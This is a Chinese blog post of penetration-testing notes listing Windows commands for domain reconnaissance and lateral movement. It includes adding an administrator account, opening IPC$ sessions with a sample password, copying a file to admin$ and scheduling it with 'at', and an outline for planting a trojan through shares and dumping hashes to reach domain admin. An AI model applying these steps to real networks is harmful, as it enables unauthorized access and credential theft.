• 【内网渗透笔记】常用系统命令


    信息收集

    set     ----- 查看系统环境变量
    whoami -----查询当前的用户账号 ipconfig
    /all -----查看本机的IP地址
    net user -----本机用户列表
    net user test test /add -----添加用户
    net localgroup administrators test /add -----账户提升为管理员权限
    net localgroup administrators -----查看某个用户组的详细信息,包括其注释、用户组的成员等
    systeminfo -----查看系统信息
    winver -----检查Windows详细版本
    tasklist /svc  -----查看有哪些进程
    netstat -ano ----- 查看有哪些网络连接端口
    net use \ipipc$ pawword /user:username -----建立IPC会话
    net user /domain ------ 查询域用户
    net view /domain ------ 查询域列表
    net view /domain:domainname ------ 查看workgroup域中计算机列表
    net group "domain admins" /domain -----查看域管理员
    net user administrator(域用户) /domain -----获取域某用户的详细信息
    net view ------ 查询同一域内机器列表
    arp -a -----查看本地存储的arp地址数据
    
    
    net view \ip ------ 查询某IP共享 
    net group /domain ------ 查询域里面的工作组
    net group "Domain Controllers" /domain  -----查看域控制器
    net localgroup administrators /domain ------ 登录本机的域管理员
    net localgroup administrators workgroupuser001 /add ------域用户添加到本机
    net time /domain ------ 判断主域,主域服务器都做时间服务器
    net config workstation ------ 当前登录域


    小技巧:

    1、tasklist /svc 查看服务,找到PID,然后通过netstat –ano 找到PID对应的端口

    C:>tasklist /svc   //找到 TermService对应PID为1128
    svchost.exe                   1128             TermService
    
    C:>netstat -ano
    Active Connections
      Proto  Local Address          Foreign Address        State           PID
      TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       688
      TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
      TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       424
      TCP    0.0.0.0:3399           0.0.0.0:0              LISTENING       1128
    //确认3399为远程端口
    

    2、内网C段存活主机查找

     for /l %i in (1,1,255) do @ping 10.9.10.%i -w 1 -n 1 | find /i "ttl"
    //来自 10.9.10.1 的回复: 字节=32 时间=4ms TTL=61
    

     3、域服务器

      一般情况下,域服务器跟DNS服务器都是同一台机器,

    nbtstat 命令  nbtstat -a test.com

    ping 命令      ping test.com

    4、IPC$连接

    net use \10.9.10.201ipc$ abc123! /user:administrator
    net use \10.9.10.201ipc$ abc123! /user:test.comadministrator
    
    
    net use * /del /yes
    
    copy 111.txt \10.9.10.201admin$
    net time \10.9.10.201
    at \10.9.10.201 1:40 111.txt

    5、内网渗透流程

    A、获取一台服务器权限,通过这台服务器进行内网信息收集,如有几个域,域管理员账号,域内共享。

    B、有共享可考虑通过共享写入木马,接着上传抓HASH工具,抓取本地HASH,获取到域管理员administrator账号

    抓hash工具

    参考文章:

    https://zhuanlan.zhihu.com/p/22710907

    http://www.360doc.com/content/16/0411/13/11559041_549701109.shtml

    https://mp.weixin.qq.com/s?__biz=MzI2NzU2MjMxOA==&mid=2247483838&idx=1&sn=4c3954b87da4231181caeba5e4422ae1&chksm=eafdbd9fdd8a34899132cda3c31fc1d881dc2ad706670ceea50c7a00e349dda50b3f84cfe1af&mpshare=1&scene=23&srcid=0108ZSYb3IwJ3ShUu5Y9QNti#rd

  • 相关阅读:
    影子的宽度&&盒子的个数
    【NOIP2017】【洛谷3958】奶酪cheese(并查集)(dfs)
    【USACO Jan 2011】【洛谷P3008】道路和航线 Roads and Planes
    增肥计划
    【洛谷1379】八数码
    【洛谷1985】【USACO07OPEN】翻转棋
    【NOI1995】极值问题
    车的放置
    【AtCoder
    Design Tutorial: Inverse the Problem
  • 原文地址:https://www.cnblogs.com/xiaozi/p/8243156.html
Copyright © 2020-2023  润新知